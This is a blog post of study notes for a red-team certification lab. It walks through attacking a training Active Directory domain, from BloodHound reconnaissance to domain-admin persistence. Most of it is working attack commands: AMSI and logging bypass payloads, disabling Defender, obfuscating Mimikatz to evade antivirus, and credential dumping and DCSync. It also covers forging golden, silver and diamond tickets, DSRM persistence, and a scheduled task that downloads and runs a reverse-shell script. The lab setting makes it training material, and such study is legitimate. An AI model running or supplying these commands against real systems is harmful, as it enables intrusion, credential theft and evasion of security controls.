CRTP (Certified Red Team Professional)

HackingSkills
10 min readDec 24, 2023

{Session2}

Admin Reconnaissance//:

it can be by :-

  • BloodHound
  • SharpHound

BloodHound it’s GUI showing the AD entities and the relationship for the collected data.

download it and setting up https://github.com/BloodHoundAD/BloodHound

to run it we need to bypass the AMSI and logging detections by running the invisishell

and then

. C:\AD\Tools\BloodHound-master\Collectors\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All

or

SharpHound.exe

To make BloodHound collection stealthy, use –Steatlh option.

Invoke-BloodHound –Steatlh

or

SharpHound.exe –-steatlh

To avoid detections like MDI

Invoke-BloodHound -ExcludeDCs

Lab manual Learning Object 6:-

Setup BloodHound:

to install and start the neo4j:

Unzip the archive C:\AD\Tools\neo4j-community-4.1.1-windows.zip

neo4j.bat install-service

neo4j.bat start

navigate to the url: http://localhost:7474

the username: neo4j and password: neo4j

open BloodHound:

C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64

enter the following →

bolt://localhost:7687

Username: neo4j

Password: new password

to run Collector:

cd C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors

$ZQCUW = @” using System; using System.Runtime.InteropServices; public class ZQCUW { [DllImport(“kernel32”)] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport(“kernel32”)] public static extern IntPtr LoadLibrary(string name); [DllImport(“kernel32”)] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); } “@ Add-Type $ZQCUW $BBWHVWQ = [ZQCUW]::LoadLibrary(“$([SYstem.Net.wEBUtIlITy]::HTmldecoDE(‘amsi.dll’))”) $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, “$([systeM.neT.webUtility]::HtMldECoDE(‘AmsiScanBuffer’))”) $p = 0 [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p) $TLML = “0xB8” $PURX = “0x57” $YNWL = “0x00” $RTGX = “0x07” $XVON = “0x80” $WRUD = “0xC3” $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD) [System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)

. .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -Verbose

End of Learning Object 6

Lateral Movement//:

it can be by :-

  • Pwershell remoting
  • Invoke-Mimikatz
  • DCSync

Pwershell remoting

powershell remoting : works like psexec but faster and more silent..

PSremoting uses windows remote management → WinRM and listen on http 5985 and https 5986.

we need to enable psremoting and have admin privilege to use it.

if you use it you will get a shell with administration privileges.

it can be in two ways:

  • one to one → using PSSessing command, it’s interactive and stateful but not stable for multiple machines, it runs as a new process

$adminsrv= New-PSSession {account name}

$adminsrv

  • one to many (Fan out remoting) → using Invoke-Command, it’s not interactive but it is stable for multiple machines, it runs commands parallelly

we can use -credential to pass username/password.

run commands

Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content {list})

run script from files

Invoke-Command -FilePath {filepath} -ComputerName (Get-Content {list})

run functions

Invoke-Command -Scriptblock ${function:Get-PassHashes} -ComputerName (Get-Content {list})

-ArgumentList

to bypass system wide transcript and script block logging we use winris

winris -remote:server1 -u:username -p:password

Invoke-Mimikatz

used to dump credentials and tickets …

need administrative privilege to run it..

DCSync:

extracting credentials from DC without code execution

AV bypassing:

  • DefenderCheck used to identify code and strings from a binary that Windows Defender may flag.

DefenderCheck.exe <Path to Sharpkatz binary>

  • compress the script
  • and add to the original scripts and copy byte size and paste it on Program.cs

Out-CompressedDll <Pathtomimikatz.exe> outputfilename.txt

  • convert the file to base 64 bits

$filename=”script_path.zip”

[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip

Modify the “Program.cs” file:

  • Added a new variable that contains the base64 value of “mimikatz_trunk.zip” file.
  • Comment the code that downloads or accepts the mimikatz file as an argument.
  • Convert the base64 string to bytes and pass it to “zipStream” variable.
  • obfuscate the binary

we use ConfuserEx:

  • Launch ConfuserEx
  • In Project tab select the Base Directory where the binary file is located.
  • In Project tab Select the Binary File that we want to obfuscate.
  • In Settings tab add the rules.
  • In Settings tab edit the rule and select the preset as `Normal`.
  • In Protect tab click on the protect button.
  • We will find the new obfuscated binary in the Confused folder under the Base Directory.

Lab manual Learning Object 7:-

bypasses Enhanced Script Block Logging:

iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)

bypass AMS:

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

download and execute PowerView in memory of the reverse shell:

iex ((New-Object Net.WebClient).DownloadString(‘http://172.16.100.X/PowerView.ps1'))

Identify a machine in the target domain where a Domain Admin session is available:

Find-DomainUserLocation

Abuse using winrs:

winrs -r:dcorp-mgmt hostname;whoami

download Loader.exe on dcorp-ci and copy it from there to dcorp-mgmt:

iwr http://172.16.100.x/Loader.exe -OutFile C:\Users\Public\Loader.exe

copy the Loader.exe to dcorp-mgmt:

echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

add the following port forwarding on dcorp-mgmt to avoid detection on dcorp-mgmt:

$null | winrs -r:dcorp-mgmt “netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x”

Use Loader.exe to download and execute SafetyKatz.exe in-memory on dcorp-mgmt:

$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

Abuse using PowerShell Remoting:

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt

Host Invoke-Mimi.ps1 on your studentx machine:

iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)

we must disable AMSI there:
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

use OverPass-the-Hash to use svcadmin’s credentials:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Try accessing the domain controller from the new process:

winrs -r:dcorp-dc whoami dcorp\svcadmin

find out the machines on which we have local admin privileges:

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess dcorp-adminsrv

check if Applocker is configured on dcorp-adminsrv by querying registry keys:

winrs -r:dcorp-adminsrv cmd

reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2

reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b-934c-454f-a263–2515c8796a5d

confirm this using PowerShell commands on dcrop-adminsrv:

Enter-PSSession dcorp-adminsrv

$ExecutionContext.SessionState.LanguageMode

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Windows Defender on the dcorp-adminsrv server:

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

modify Invoke-Mimi.ps1 to include the function call in the script itself and transfer the modified script (Invoke-MimiEx.ps1) to the target server:

Create a copy of Invoke-Mimi.ps1 and rename it to Invoke-MimiEx.ps1:

Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\’Program Files

ls

Open Invoke-MimiEx.ps1 in PowerShell ISE (Right click on it and click Edit)

Add “Invoke-Mimi -Command ‘“sekurlsa::ekeys”’ “ (without quotes) to the end of the file.

run the modified mimikatz script:

.\Invoke-MimiEx.ps1

OverPass-the-Hash for srvadmin user using Safetykatz:

C:\AD\Tools\SafetyKatz.exe “sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe” “exit”

Check if srvadmin has admin privileges on any other machine:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess -Verbose

extract credentials from the machine:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

winrs -r:dcorp-mgmt cmd

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

Take a session to dcorp-mgmt with PSRemoting:

Enter-PSSession -ComputerName dcorp-mgmt

whoami

disable AMSI on the target server:

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Download and Execute Invoke-Mimiatz:

iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)

Invoke-Mimi -Command ‘“sekurlsa::ekeys”’

Invoke-Mimi for extracting credentials from credentials vault:

Invoke-Mimi -Command ‘“token::elevate” “vault::cred /patch”’

use the svcadmin credentials on the student VM using OverPass-the-hash:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

End of Learning Object 7

Domain Admin Privilege//:

kerberos is authentication in a widows active directory.

programs needs to obtain tickets [credentials] from KDC → key distribution which is a service running on the domain controller

kerberos attacks(persistence):

  • Colden Ticket
  • Silver Ticket
  • Diamond Ticket
  • Skeleton Key
  • DSRM

Golden Ticket:

it’s signed and encrypted ticket by the hash of krbtqt

Lab manual Learning Object 8:-

Extract secrets from the domain controller of dollarcorp:

Start a process with Domain Admin privileges:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

copy Loader.exe on dcorp-dc and use it to extract credentials:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x

svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

mimikatz # lsadump::lsa /patch

To get NTLM hash and AES keys of the krbtgt account:

C:\AD\Tools\SafetyKatz.exe “lsadump::dcsync /user:dcorp\krbtgt” “exit”

create a Golden ticket:

C:\AD\Tools\BetterSafetyKatz.exe “kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1–5–21–719815819–3726368948–3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt” “exit”

klist

dir \\dcorp-dc\c$

Start a process with Domain Admin privileges:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command ‘“sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:cmd.exe”’

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

cd C:\AD\Tools

$sess = New-PSSession -ComputerName dcorp-dc

Enter-PSSession $sess

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

exit

Invoke-Command -FilePath .\Invoke-Mimi.ps1 -Session $sess

Enter-PSSession $sess

Invoke-Mimi -Command ‘“lsadump::lsa /patch”’

run the DCSync attack from the process running as DA:

Invoke-Mimi -Command ‘“lsadump::dcsync /user:dcorp\krbtgt”’

Create a Golden ticket:

Invoke-Mimi -Command ‘“kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1–5–21–719815819–3726368948–3917688648 /aes256: 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt”’

Try accessing the filesystem on the domain controller:

ls \\dcorp-dc \c$

run WMI commands on the DC:

gwmi -Class win32_computersystem -ComputerName dcorp-dc

End of Learning Object 8

Silver Ticket:

it’s signed and encrypted ticket by the hash of service account

services rarely check PAC → Privileged Attribute Certificate

Lab manual Learning Object 9:-

get command execution on the domain controller by creating silver ticket:

C:\AD\Tools\BetterSafetyKatz.exe “kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1–5–21–719815819–3726368948–3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt” “exit”

OR

Invoke-Mimi -Command ‘“kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1–5–21–719815819–3726368948–3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4: 98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt”’

Start a listener and schedule and execute a task to run the reverse shell script:

- Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.

- Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit).

  • Add “Power -Reverse -IPAddress 172.16.100.X -Port 443” (without quotes) to the end of the file.

schtasks /create /S dcorp-dc /SC Weekly /RU “NT Authority\SYSTEM” /TN “UserX” /TR “powershell.exe -c ‘iex (New-Object Net.WebClient).DownloadString(‘’http://172.16.100.X/Invoke-PowerShellTcpEx.ps1''')'"

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN “UserX”

On the listener:

C:\AD\Tools\netcat-win32–1.12\nc64.exe -lvp 443

hostname

whoami

For accessing WMI, we need to create two tickets — one for HOST service and another for RPCSS. Run the below commands from an elevated shell:

C:\AD\Tools\BetterSafetyKatz.exe “kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1–5–21–719815819–3726368948–3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt” “exit”

Inject a ticket for RPCSS:

C:\AD\Tools\BetterSafetyKatz.exe “kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1–5–21–719815819–3726368948–3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt” “exit”

Check if the tickets are present:

klist

try running WMI commands on the domain controller:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc

End of Learning Object 9

Diamond Ticket:

is decrypted a valid tgt making changes then re-encrypt it by AES key of krbtgt

is more safe

Lab manual Learning Object 10:-

Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack:

C:\AD\Tools\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Access the DC:

winrs -r:dcorp-dc cmd

whoami

End of Learning Object 10

Skeleton Key:

it is used to patch a domain controller (lsass process) to allow access as any user with a single password

DSRM:

is Directory Service Restore Mode

there’s local administrator on every dc called Administrator with DSRM password

DSRM password is required wen the server is promoted to DC and it’s rarely changed.

after modifying the DC configurations , we can pass the NTLM hash to access DC

Lab manual Learning Object 11:-

Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence:

open a PowerShell remoting session:

$sess = New-PSSession dcorp-dc

Enter-PSSession -Session $sess

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Load the Invoke-Mimi script in the session:

Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess

extract the credentials from the SAM file from the DC:

Enter-PSSession -Session $sess

Invoke-Mimi -Command ‘“token::elevate” “lsadump::sam”’

change the logon behavior for the account by modifying registry on the DC:

New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD

pass the hash for the DSRM administrator:

Invoke-Mimi -Command ‘“sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe”’

access the dcorp-dc directly from the new session:

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

End of Learning Object 11

End of module2

Created On 24th, December 2023

Edited on 6th, January 2024

--

--